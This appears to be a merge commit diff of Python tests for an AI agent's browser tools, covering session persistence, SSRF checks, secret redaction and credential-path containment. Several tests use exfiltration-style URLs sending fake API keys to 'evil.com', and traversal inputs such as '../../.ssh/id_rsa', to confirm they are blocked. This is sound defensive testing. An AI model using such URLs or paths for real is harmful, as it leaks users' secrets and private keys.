Merge branch 'main' into rewbs/tool-use-charge-to-subscription

This commit is contained in:
Ben Barclay
2026-04-02 11:00:35 +11:00
175 changed files with 18848 additions and 3772 deletions

View File

@@ -235,8 +235,13 @@ class TestCamofoxGetImages:
mock_post.return_value = _mock_response(json_data={"tabId": "tab10", "url": "https://x.com"})
camofox_navigate("https://x.com", task_id="t10")
# camofox_get_images parses images from the accessibility tree snapshot
snapshot_text = (
'- img "Logo"\n'
' /url: https://x.com/img.png\n'
)
mock_get.return_value = _mock_response(json_data={
"images": [{"src": "https://x.com/img.png", "alt": "Logo"}],
"snapshot": snapshot_text,
})
result = json.loads(camofox_get_images(task_id="t10"))
assert result["success"] is True

View File

@@ -0,0 +1,242 @@
"""Persistence tests for the Camofox browser backend.
Tests that managed persistence uses stable identity while default mode
uses random identity. The actual browser profile persistence is handled
by the Camofox server (when CAMOFOX_PROFILE_DIR is set).
"""
import json
from unittest.mock import MagicMock, patch
import pytest
from tools.browser_camofox import (
_drop_session,
_get_session,
_managed_persistence_enabled,
camofox_close,
camofox_navigate,
check_camofox_available,
cleanup_all_camofox_sessions,
get_vnc_url,
)
from tools.browser_camofox_state import get_camofox_identity
def _mock_response(status=200, json_data=None):
resp = MagicMock()
resp.status_code = status
resp.json.return_value = json_data or {}
resp.raise_for_status = MagicMock()
return resp
def _enable_persistence():
"""Return a patch context that enables managed persistence via config."""
config = {"browser": {"camofox": {"managed_persistence": True}}}
return patch("tools.browser_camofox.load_config", return_value=config)
@pytest.fixture(autouse=True)
def _clear_session_state():
    """After each test, wipe module-level session and VNC caches so state
    never leaks between tests."""
    import tools.browser_camofox as camofox
    yield
    with camofox._sessions_lock:
        camofox._sessions.clear()
        camofox._vnc_url = None
        camofox._vnc_url_checked = False
class TestManagedPersistenceToggle:
    """The browser.camofox.managed_persistence config flag gates persistence."""

    @staticmethod
    def _patched_config(cfg):
        """Patch load_config to return *cfg* for the duration of a test."""
        return patch("tools.browser_camofox.load_config", return_value=cfg)

    def test_disabled_by_default(self):
        toggle_off = {"browser": {"camofox": {"managed_persistence": False}}}
        with self._patched_config(toggle_off):
            assert _managed_persistence_enabled() is False

    def test_enabled_via_config_yaml(self):
        toggle_on = {"browser": {"camofox": {"managed_persistence": True}}}
        with self._patched_config(toggle_on):
            assert _managed_persistence_enabled() is True

    def test_disabled_when_key_missing(self):
        with self._patched_config({"browser": {}}):
            assert _managed_persistence_enabled() is False

    def test_disabled_on_config_load_error(self):
        # Config read failures must fail closed: persistence stays off.
        with patch("tools.browser_camofox.load_config", side_effect=Exception("fail")):
            assert _managed_persistence_enabled() is False
class TestEphemeralMode:
    """Default behavior: random userId, no persistence."""

    @staticmethod
    def _point_at_local_server(monkeypatch, tmp_path):
        """Give each test an isolated HERMES_HOME and a local Camofox URL."""
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")

    def test_session_gets_random_user_id(self, tmp_path, monkeypatch):
        self._point_at_local_server(monkeypatch, tmp_path)
        sess = _get_session("task-1")
        assert sess["user_id"].startswith("hermes_")
        assert sess["managed"] is False

    def test_different_tasks_get_different_user_ids(self, tmp_path, monkeypatch):
        self._point_at_local_server(monkeypatch, tmp_path)
        first = _get_session("task-1")
        second = _get_session("task-2")
        assert first["user_id"] != second["user_id"]

    def test_session_reuse_within_same_task(self, tmp_path, monkeypatch):
        self._point_at_local_server(monkeypatch, tmp_path)
        first = _get_session("task-1")
        # Same task id must yield the very same cached session object.
        assert _get_session("task-1") is first
class TestManagedPersistenceMode:
    """With managed_persistence: stable userId derived from Hermes profile."""

    def test_session_gets_stable_user_id(self, tmp_path, monkeypatch):
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        with _enable_persistence():
            session = _get_session("task-1")
            expected = get_camofox_identity("task-1")
            # Session identity must match the deterministic profile identity
            # and be flagged as managed.
            assert session["user_id"] == expected["user_id"]
            assert session["session_key"] == expected["session_key"]
            assert session["managed"] is True

    def test_same_user_id_after_session_drop(self, tmp_path, monkeypatch):
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        with _enable_persistence():
            s1 = _get_session("task-1")
            uid1 = s1["user_id"]
            # Dropping and recreating the session must keep the stable userId.
            _drop_session("task-1")
            s2 = _get_session("task-1")
            assert s2["user_id"] == uid1

    def test_same_user_id_across_tasks(self, tmp_path, monkeypatch):
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        with _enable_persistence():
            s1 = _get_session("task-a")
            s2 = _get_session("task-b")
            # Same profile = same userId, different session keys
            assert s1["user_id"] == s2["user_id"]
            assert s1["session_key"] != s2["session_key"]

    def test_different_profiles_get_different_user_ids(self, tmp_path, monkeypatch):
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        with _enable_persistence():
            # The userId is derived from HERMES_HOME, so two different
            # profile directories must yield two different identities.
            monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-a"))
            s1 = _get_session("task-1")
            uid_a = s1["user_id"]
            _drop_session("task-1")
            monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-b"))
            s2 = _get_session("task-1")
            assert s2["user_id"] != uid_a

    def test_navigate_uses_stable_identity(self, tmp_path, monkeypatch):
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        requests_seen = []

        def _capture_post(url, json=None, timeout=None):
            # Record the POST body so the userId sent to Camofox can be checked.
            requests_seen.append(json)
            return _mock_response(
                json_data={"tabId": "tab-1", "url": "https://example.com"}
            )

        with _enable_persistence(), \
                patch("tools.browser_camofox.requests.post", side_effect=_capture_post):
            result = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
            assert result["success"] is True
            expected = get_camofox_identity("task-1")
            assert requests_seen[0]["userId"] == expected["user_id"]

    def test_navigate_reuses_identity_after_close(self, tmp_path, monkeypatch):
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        requests_seen = []

        def _capture_post(url, json=None, timeout=None):
            requests_seen.append(json)
            return _mock_response(
                json_data={"tabId": f"tab-{len(requests_seen)}", "url": "https://example.com"}
            )

        with (
            _enable_persistence(),
            patch("tools.browser_camofox.requests.post", side_effect=_capture_post),
            patch("tools.browser_camofox.requests.delete", return_value=_mock_response()),
        ):
            first = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
            camofox_close("task-1")
            second = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
            assert first["success"] is True
            assert second["success"] is True
            # Only the tab-creation POSTs carry a userId; both navigations
            # must have sent the same stable identity.
            tab_requests = [req for req in requests_seen if "userId" in req]
            assert len(tab_requests) == 2
            assert tab_requests[0]["userId"] == tab_requests[1]["userId"]
class TestVncUrlDiscovery:
    """VNC URL is derived from the Camofox health endpoint."""

    def test_vnc_url_from_health_port(self, monkeypatch):
        monkeypatch.setenv("CAMOFOX_URL", "http://myhost:9377")
        health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
        with patch("tools.browser_camofox.requests.get", return_value=health_resp):
            assert check_camofox_available() is True
            # VNC URL keeps the Camofox host but swaps in the reported port.
            assert get_vnc_url() == "http://myhost:6080"

    def test_vnc_url_none_when_headless(self, monkeypatch):
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        # No vncPort in /health means the server runs headless.
        health_resp = _mock_response(json_data={"ok": True})
        with patch("tools.browser_camofox.requests.get", return_value=health_resp):
            check_camofox_available()
            assert get_vnc_url() is None

    def test_vnc_url_rejects_invalid_port(self, monkeypatch):
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        # A non-integer vncPort must be ignored rather than crash.
        health_resp = _mock_response(json_data={"ok": True, "vncPort": "bad"})
        with patch("tools.browser_camofox.requests.get", return_value=health_resp):
            check_camofox_available()
            assert get_vnc_url() is None

    def test_vnc_url_only_probed_once(self, monkeypatch):
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
        with patch("tools.browser_camofox.requests.get", return_value=health_resp) as mock_get:
            check_camofox_available()
            check_camofox_available()
            # Second call still hits /health for availability but doesn't re-parse vncPort
            assert get_vnc_url() == "http://localhost:6080"

    def test_navigate_includes_vnc_hint(self, tmp_path, monkeypatch):
        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
        monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
        import tools.browser_camofox as mod
        # Pre-seed the cached VNC URL so navigate needs no health probe.
        mod._vnc_url = "http://localhost:6080"
        mod._vnc_url_checked = True
        with patch("tools.browser_camofox.requests.post", return_value=_mock_response(
            json_data={"tabId": "t1", "url": "https://example.com"}
        )):
            result = json.loads(camofox_navigate("https://example.com", task_id="vnc-test"))
            assert result["vnc_url"] == "http://localhost:6080"
            assert "vnc_hint" in result

View File

@@ -0,0 +1,66 @@
"""Tests for Hermes-managed Camofox state helpers."""
from unittest.mock import patch
import pytest
def _load_module():
    """Import and return the browser_camofox_state module under test."""
    import tools.browser_camofox_state as state_module
    return state_module
class TestCamofoxStatePaths:
    """Camofox state files live under <hermes_home>/browser_auth/camofox."""

    def test_paths_are_profile_scoped(self, tmp_path):
        state = _load_module()
        with patch.object(state, "get_hermes_home", return_value=tmp_path):
            expected_dir = tmp_path / "browser_auth" / "camofox"
            assert state.get_camofox_state_dir() == expected_dir
class TestCamofoxIdentity:
    """Identity derivation: stable per profile, unique session key per task."""

    def test_identity_is_deterministic(self, tmp_path):
        state = _load_module()
        with patch.object(state, "get_hermes_home", return_value=tmp_path):
            # Two calls for the same task must agree exactly.
            assert state.get_camofox_identity("task-1") == state.get_camofox_identity("task-1")

    def test_identity_differs_by_task(self, tmp_path):
        state = _load_module()
        with patch.object(state, "get_hermes_home", return_value=tmp_path):
            ident_a = state.get_camofox_identity("task-a")
            ident_b = state.get_camofox_identity("task-b")
        # Same user (same profile), different session keys
        assert ident_a["user_id"] == ident_b["user_id"]
        assert ident_a["session_key"] != ident_b["session_key"]

    def test_identity_differs_by_profile(self, tmp_path):
        state = _load_module()
        identities = []
        for profile_name in ("profile-a", "profile-b"):
            with patch.object(state, "get_hermes_home", return_value=tmp_path / profile_name):
                identities.append(state.get_camofox_identity("task-1"))
        assert identities[0]["user_id"] != identities[1]["user_id"]

    def test_default_task_id(self, tmp_path):
        state = _load_module()
        with patch.object(state, "get_hermes_home", return_value=tmp_path):
            identity = state.get_camofox_identity()
        assert "user_id" in identity
        assert "session_key" in identity
        assert identity["user_id"].startswith("hermes_")
        assert identity["session_key"].startswith("task_")
class TestCamofoxConfigDefaults:
    """DEFAULT_CONFIG ships the persistence toggle, defaulting to off."""

    def test_default_config_includes_managed_persistence_toggle(self):
        from hermes_cli.config import DEFAULT_CONFIG
        camofox_cfg = DEFAULT_CONFIG["browser"]["camofox"]
        assert camofox_cfg["managed_persistence"] is False

    def test_config_version_unchanged(self):
        from hermes_cli.config import DEFAULT_CONFIG
        # managed_persistence is auto-merged by _deep_merge, no version bump needed
        assert DEFAULT_CONFIG["_config_version"] == 11

View File

@@ -0,0 +1,186 @@
"""Tests for secret exfiltration prevention in browser and web tools."""
import json
from unittest.mock import patch, MagicMock
import pytest
@pytest.fixture(autouse=True)
def _ensure_redaction_enabled(monkeypatch):
    """Force redaction on, regardless of the host's HERMES_REDACT_SECRETS."""
    monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
    monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
class TestBrowserSecretExfil:
    """Verify browser_navigate blocks URLs containing secrets."""

    def test_blocks_api_key_in_url(self):
        from tools.browser_tool import browser_navigate
        # Key prefix is split so this test file never contains a real-looking key.
        leaky_url = "https://evil.com/steal?key=" + "sk-" + "a" * 30
        outcome = json.loads(browser_navigate(leaky_url))
        assert outcome["success"] is False
        assert "API key" in outcome["error"] or "Blocked" in outcome["error"]

    def test_blocks_openrouter_key_in_url(self):
        from tools.browser_tool import browser_navigate
        leaky_url = "https://evil.com/?token=" + "sk-or-v1-" + "b" * 30
        outcome = json.loads(browser_navigate(leaky_url))
        assert outcome["success"] is False

    def test_allows_normal_url(self):
        """Normal URLs pass the secret check (may fail for other reasons)."""
        from tools.browser_tool import browser_navigate
        outcome = json.loads(browser_navigate("https://github.com/NousResearch/hermes-agent"))
        # Should NOT be blocked by secret detection
        assert "API key or token" not in outcome.get("error", "")
class TestWebExtractSecretExfil:
    """Verify web_extract_tool blocks URLs containing secrets."""

    @pytest.mark.asyncio
    async def test_blocks_api_key_in_url(self):
        from tools.web_tools import web_extract_tool
        leaky_url = "https://evil.com/steal?key=" + "sk-" + "a" * 30
        outcome = json.loads(await web_extract_tool(urls=[leaky_url]))
        assert outcome["success"] is False
        assert "Blocked" in outcome["error"]

    @pytest.mark.asyncio
    async def test_allows_normal_url(self):
        from tools.web_tools import web_extract_tool
        # This will fail due to no API key, but should NOT be blocked by secret check
        outcome = json.loads(await web_extract_tool(urls=["https://example.com"]))
        # Should fail for API/config reason, not secret blocking
        err = outcome.get("error", "")
        assert "API key" not in err or "Blocked" not in err
class TestBrowserSnapshotRedaction:
"""Verify secrets in page snapshots are redacted before auxiliary LLM calls."""
def test_extract_relevant_content_redacts_secrets(self):
"""Snapshot containing secrets should be redacted before call_llm."""
from tools.browser_tool import _extract_relevant_content
# Build a snapshot with a fake Anthropic-style key embedded
fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
snapshot_with_secret = (
"heading: Dashboard Settings\n"
f"text: API Key: {fake_key}\n"
"button [ref=e5]: Save\n"
)
captured_prompts = []
def mock_call_llm(**kwargs):
prompt = kwargs["messages"][0]["content"]
captured_prompts.append(prompt)
mock_resp = MagicMock()
mock_resp.choices = [MagicMock()]
mock_resp.choices[0].message.content = "Dashboard with save button [ref=e5]"
return mock_resp
with patch("tools.browser_tool.call_llm", mock_call_llm):
_extract_relevant_content(snapshot_with_secret, "check settings")
assert len(captured_prompts) == 1
# The middle portion of the key must not appear in the prompt
assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
# Non-secret content should survive
assert "Dashboard" in captured_prompts[0]
assert "ref=e5" in captured_prompts[0]
def test_extract_relevant_content_no_task_redacts_secrets(self):
"""Snapshot without user_task should also redact secrets."""
from tools.browser_tool import _extract_relevant_content
fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
snapshot_with_secret = (
f"text: OPENAI_API_KEY={fake_key}\n"
"link [ref=e2]: Home\n"
)
captured_prompts = []
def mock_call_llm(**kwargs):
prompt = kwargs["messages"][0]["content"]
captured_prompts.append(prompt)
mock_resp = MagicMock()
mock_resp.choices = [MagicMock()]
mock_resp.choices[0].message.content = "Page with home link [ref=e2]"
return mock_resp
with patch("tools.browser_tool.call_llm", mock_call_llm):
_extract_relevant_content(snapshot_with_secret)
assert len(captured_prompts) == 1
assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
def test_extract_relevant_content_normal_snapshot_unchanged(self):
"""Snapshot without secrets should pass through normally."""
from tools.browser_tool import _extract_relevant_content
normal_snapshot = (
"heading: Welcome\n"
"text: Click the button below to continue\n"
"button [ref=e1]: Continue\n"
)
captured_prompts = []
def mock_call_llm(**kwargs):
prompt = kwargs["messages"][0]["content"]
captured_prompts.append(prompt)
mock_resp = MagicMock()
mock_resp.choices = [MagicMock()]
mock_resp.choices[0].message.content = "Welcome page with continue button"
return mock_resp
with patch("tools.browser_tool.call_llm", mock_call_llm):
_extract_relevant_content(normal_snapshot, "proceed")
assert len(captured_prompts) == 1
assert "Welcome" in captured_prompts[0]
assert "Continue" in captured_prompts[0]
class TestCamofoxAnnotationRedaction:
    """Verify annotation context is redacted before vision LLM call."""

    def test_annotation_context_secrets_redacted(self):
        """Secrets in accessibility tree annotation should be masked."""
        from agent.redact import redact_sensitive_text
        fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
        context = "\n\nAccessibility tree (element refs for interaction):\n"
        context += f"text: Token: {fake_token}\n"
        context += "button [ref=e3]: Copy\n"
        redacted = redact_sensitive_text(context)
        assert "FAKEGITHUBTOKEN123456789" not in redacted
        # Non-secret parts preserved
        assert "button" in redacted
        assert "ref=e3" in redacted

    def test_annotation_env_dump_redacted(self):
        """Env var dump in annotation context should be redacted."""
        from agent.redact import redact_sensitive_text
        fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
        fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
        lines = [
            "\n\nAccessibility tree (element refs for interaction):",
            f"text: ANTHROPIC_API_KEY={fake_anth}",
            f"text: OPENAI_API_KEY={fake_oai}",
            "text: PATH=/usr/local/bin",
        ]
        redacted = redact_sensitive_text("\n".join(lines) + "\n")
        assert "ANTHROPICFAKEKEY123456789" not in redacted
        assert "OPENAIFAKEKEY99887766" not in redacted
        # Benign env vars must survive redaction untouched.
        assert "PATH=/usr/local/bin" in redacted

View File

@@ -0,0 +1,237 @@
"""Tests that browser_navigate SSRF checks respect local-backend mode and
the allow_private_urls setting.
Local backends (Camofox, headless Chromium without a cloud provider) skip
SSRF checks entirely — the agent already has full local-network access via
the terminal tool.
Cloud backends (Browserbase, BrowserUse) enforce SSRF by default. Users
can opt out for cloud mode via ``browser.allow_private_urls: true``.
"""
import json
import pytest
from tools import browser_tool
def _make_browser_result(url="https://example.com"):
"""Return a mock successful browser command result."""
return {"success": True, "data": {"title": "OK", "url": url}}
# ---------------------------------------------------------------------------
# Pre-navigation SSRF check
# ---------------------------------------------------------------------------
class TestPreNavigationSsrf:
    # Representative loopback URL the SSRF check should treat as private.
    PRIVATE_URL = "http://127.0.0.1:8080/dashboard"

    @pytest.fixture()
    def _common_patches(self, monkeypatch):
        """Shared patches for pre-navigation tests that pass the SSRF check."""
        # Not Camofox, website access allowed, and a canned local session so
        # browser_navigate reaches the SSRF decision without any real I/O.
        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
        monkeypatch.setattr(browser_tool, "check_website_access", lambda url: None)
        monkeypatch.setattr(
            browser_tool,
            "_get_session_info",
            lambda task_id: {
                "session_name": f"s_{task_id}",
                "bb_session_id": None,
                "cdp_url": None,
                "features": {"local": True},
                "_first_nav": False,
            },
        )
        monkeypatch.setattr(
            browser_tool,
            "_run_browser_command",
            lambda *a, **kw: _make_browser_result(),
        )

    # -- Cloud mode: SSRF active -----------------------------------------------
    def test_cloud_blocks_private_url_by_default(self, monkeypatch, _common_patches):
        """SSRF protection blocks private URLs in cloud mode."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
        result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
        assert result["success"] is False
        assert "private or internal address" in result["error"]

    def test_cloud_allows_private_url_when_setting_true(self, monkeypatch, _common_patches):
        """Private URLs pass in cloud mode when allow_private_urls is True."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: True)
        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
        result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
        assert result["success"] is True

    def test_cloud_allows_public_url(self, monkeypatch, _common_patches):
        """Public URLs always pass in cloud mode."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
        result = json.loads(browser_tool.browser_navigate("https://example.com"))
        assert result["success"] is True

    # -- Local mode: SSRF skipped ----------------------------------------------
    def test_local_allows_private_url(self, monkeypatch, _common_patches):
        """Local backends skip SSRF — private URLs are always allowed."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
        result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
        assert result["success"] is True

    def test_local_allows_public_url(self, monkeypatch, _common_patches):
        """Local backends pass public URLs too (sanity check)."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
        result = json.loads(browser_tool.browser_navigate("https://example.com"))
        assert result["success"] is True
# ---------------------------------------------------------------------------
# _is_local_backend() unit tests
# ---------------------------------------------------------------------------
class TestIsLocalBackend:
    """Unit tests for browser_tool._is_local_backend()."""

    @staticmethod
    def _set_backend(monkeypatch, camofox, provider):
        """Stub out the two inputs _is_local_backend consults."""
        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: camofox)
        monkeypatch.setattr(browser_tool, "_get_cloud_provider", lambda: provider)

    def test_camofox_is_local(self, monkeypatch):
        """Camofox mode counts as a local backend."""
        self._set_backend(monkeypatch, camofox=True, provider="anything")
        assert browser_tool._is_local_backend() is True

    def test_no_cloud_provider_is_local(self, monkeypatch):
        """No cloud provider configured → local backend."""
        self._set_backend(monkeypatch, camofox=False, provider=None)
        assert browser_tool._is_local_backend() is True

    def test_cloud_provider_is_not_local(self, monkeypatch):
        """Cloud provider configured and not Camofox → NOT local."""
        self._set_backend(monkeypatch, camofox=False, provider="bb")
        assert browser_tool._is_local_backend() is False
# ---------------------------------------------------------------------------
# Post-redirect SSRF check
# ---------------------------------------------------------------------------
class TestPostRedirectSsrf:
    # Public entry URL and the private address the mocked browser "lands" on.
    PUBLIC_URL = "https://example.com/redirect"
    PRIVATE_FINAL_URL = "http://192.168.1.1/internal"

    @pytest.fixture()
    def _common_patches(self, monkeypatch):
        """Shared patches for redirect tests."""
        # Not Camofox, website access allowed, and a canned session; each
        # test supplies its own _run_browser_command to control the final URL.
        monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
        monkeypatch.setattr(browser_tool, "check_website_access", lambda url: None)
        monkeypatch.setattr(
            browser_tool,
            "_get_session_info",
            lambda task_id: {
                "session_name": f"s_{task_id}",
                "bb_session_id": None,
                "cdp_url": None,
                "features": {"local": True},
                "_first_nav": False,
            },
        )

    # -- Cloud mode: redirect SSRF active --------------------------------------
    def test_cloud_blocks_redirect_to_private(self, monkeypatch, _common_patches):
        """Redirects to private addresses are blocked in cloud mode."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
        # _is_safe_url treats any 192.168.* URL as private.
        monkeypatch.setattr(
            browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
        )
        monkeypatch.setattr(
            browser_tool,
            "_run_browser_command",
            lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
        )
        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
        assert result["success"] is False
        assert "redirect landed on a private/internal address" in result["error"]

    def test_cloud_allows_redirect_to_private_when_setting_true(self, monkeypatch, _common_patches):
        """Redirects to private addresses pass in cloud mode with allow_private_urls."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: True)
        monkeypatch.setattr(
            browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
        )
        monkeypatch.setattr(
            browser_tool,
            "_run_browser_command",
            lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
        )
        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
        assert result["success"] is True
        assert result["url"] == self.PRIVATE_FINAL_URL

    # -- Local mode: redirect SSRF skipped -------------------------------------
    def test_local_allows_redirect_to_private(self, monkeypatch, _common_patches):
        """Redirects to private addresses pass in local mode."""
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
        monkeypatch.setattr(
            browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
        )
        monkeypatch.setattr(
            browser_tool,
            "_run_browser_command",
            lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
        )
        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
        assert result["success"] is True
        assert result["url"] == self.PRIVATE_FINAL_URL

    def test_cloud_allows_redirect_to_public(self, monkeypatch, _common_patches):
        """Redirects to public addresses always pass (cloud mode)."""
        final = "https://example.com/final"
        monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
        monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
        monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
        monkeypatch.setattr(
            browser_tool,
            "_run_browser_command",
            lambda *a, **kw: _make_browser_result(url=final),
        )
        result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
        assert result["success"] is True
        assert result["url"] == final

View File

@@ -197,3 +197,164 @@ class TestIterSkillsFiles:
with patch.dict(os.environ, {"HERMES_HOME": str(hermes_home)}):
assert iter_skills_files() == []
class TestPathTraversalSecurity:
    """Path traversal and absolute path rejection.

    A malicious skill could declare::

        required_credential_files:
          - path: '../../.ssh/id_rsa'

    Without containment checks, this would mount the host's SSH private key
    into the container sandbox, leaking it to the skill's execution environment.
    """

    def test_dotdot_traversal_rejected(self, tmp_path, monkeypatch):
        """'../sensitive' must not escape HERMES_HOME."""
        monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
        (tmp_path / ".hermes").mkdir()
        # Create a sensitive file one level above hermes_home
        sensitive = tmp_path / "sensitive.json"
        sensitive.write_text('{"secret": "value"}')
        result = register_credential_file("../sensitive.json")
        # Registration must fail and nothing may be queued for mounting.
        assert result is False
        assert get_credential_file_mounts() == []

    def test_deep_traversal_rejected(self, tmp_path, monkeypatch):
        """'../../etc/passwd' style traversal must be rejected."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        # Create a fake sensitive file outside hermes_home
        ssh_dir = tmp_path / ".ssh"
        ssh_dir.mkdir()
        (ssh_dir / "id_rsa").write_text("PRIVATE KEY")
        result = register_credential_file("../../.ssh/id_rsa")
        assert result is False
        assert get_credential_file_mounts() == []

    def test_absolute_path_rejected(self, tmp_path, monkeypatch):
        """Absolute paths must be rejected regardless of whether they exist."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        # Create a file at an absolute path
        sensitive = tmp_path / "absolute.json"
        sensitive.write_text("{}")
        result = register_credential_file(str(sensitive))
        assert result is False
        assert get_credential_file_mounts() == []

    def test_legitimate_file_still_works(self, tmp_path, monkeypatch):
        """Normal files inside HERMES_HOME must still be registered."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        (hermes_home / "token.json").write_text('{"token": "abc"}')
        result = register_credential_file("token.json")
        assert result is True
        mounts = get_credential_file_mounts()
        assert len(mounts) == 1
        assert "token.json" in mounts[0]["container_path"]

    def test_nested_subdir_inside_hermes_home_allowed(self, tmp_path, monkeypatch):
        """Files in subdirectories of HERMES_HOME must be allowed."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        subdir = hermes_home / "creds"
        subdir.mkdir()
        (subdir / "oauth.json").write_text("{}")
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        result = register_credential_file("creds/oauth.json")
        assert result is True

    def test_symlink_traversal_rejected(self, tmp_path, monkeypatch):
        """A symlink inside HERMES_HOME pointing outside must be rejected."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        # Create a sensitive file outside hermes_home
        sensitive = tmp_path / "sensitive.json"
        sensitive.write_text('{"secret": "value"}')
        # Create a symlink inside hermes_home pointing outside
        symlink = hermes_home / "evil_link.json"
        try:
            symlink.symlink_to(sensitive)
        except (OSError, NotImplementedError):
            # Some platforms (e.g. Windows without privileges) can't symlink.
            pytest.skip("Symlinks not supported on this platform")
        result = register_credential_file("evil_link.json")
        # The resolved path escapes HERMES_HOME — must be rejected
        assert result is False
        assert get_credential_file_mounts() == []
# ---------------------------------------------------------------------------
# Config-based credential files — same containment checks
# ---------------------------------------------------------------------------
class TestConfigPathTraversal:
    """terminal.credential_files in config.yaml must also reject traversal."""

    def _write_config(self, hermes_home, cred_files: list):
        """Write a config.yaml under *hermes_home* declaring *cred_files*.

        ``hermes_home`` is a ``pathlib.Path``. The eager ``Path`` annotation
        was dropped: this appended hunk cannot guarantee ``Path`` is imported
        at module scope, and a bare annotation would raise NameError when the
        class body executes at import time.
        """
        import yaml
        config_path = hermes_home / "config.yaml"
        config_path.write_text(yaml.dump({"terminal": {"credential_files": cred_files}}))

    def test_config_traversal_rejected(self, tmp_path, monkeypatch):
        """'../secret' in config.yaml must not escape HERMES_HOME."""
        hermes_home = tmp_path / ".hermes"
        hermes_home.mkdir()
        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
        sensitive = tmp_path / "secret.json"
        sensitive.write_text("{}")
        self._write_config(hermes_home, ["../secret.json"])
        mounts = get_credential_file_mounts()
        # The escaping file must not appear in any mount, resolved or not.
        host_paths = [m["host_path"] for m in mounts]
        assert str(sensitive) not in host_paths
        assert str(sensitive.resolve()) not in host_paths

